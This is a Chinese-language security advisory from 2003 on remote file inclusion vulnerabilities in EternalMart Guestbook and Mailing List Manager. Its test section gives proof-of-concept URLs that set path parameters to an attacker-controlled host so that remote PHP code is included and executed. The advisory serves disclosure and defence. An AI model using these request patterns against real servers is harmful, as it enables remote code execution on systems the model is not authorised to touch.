安全研究

安全漏洞
EternalMart多个文件包含漏洞

发布日期:2003-10-04
更新日期:2003-10-14

受影响系统:
EternalMart Guestbook 1.1
EternalMart Mailing List Manager 1.32
描述:
BUGTRAQ  ID: 8767

EternalMart包含邮件列表管理和客户留言本系统。

EternalMart没有正确处理用户提交的请求,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。

EternalMart邮件管理程序对用户提交的$emml_path变量缺少充分过滤,可导致远程攻击者提交恶意数据给$emml_path,包含攻击者指定的远程服务器上文件,以WEB权限在系统内执行任意PHP代码。

另外EternalMart客户留言系统上对$emgb_admin_path变量也缺少过滤,同样存在上述问题。

<*来源:Frog Man (leseulfrog@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106529524431712&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Frog Man (leseulfrog@hotmail.com)提供了如下测试方法:

EMML :
- http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php

- http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php

EMGB :

- http://[target]/admin/auth.php?emgb_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php

建议:
厂商补丁:

EternalMart
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.eternalmart.com

浏览次数:2939
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障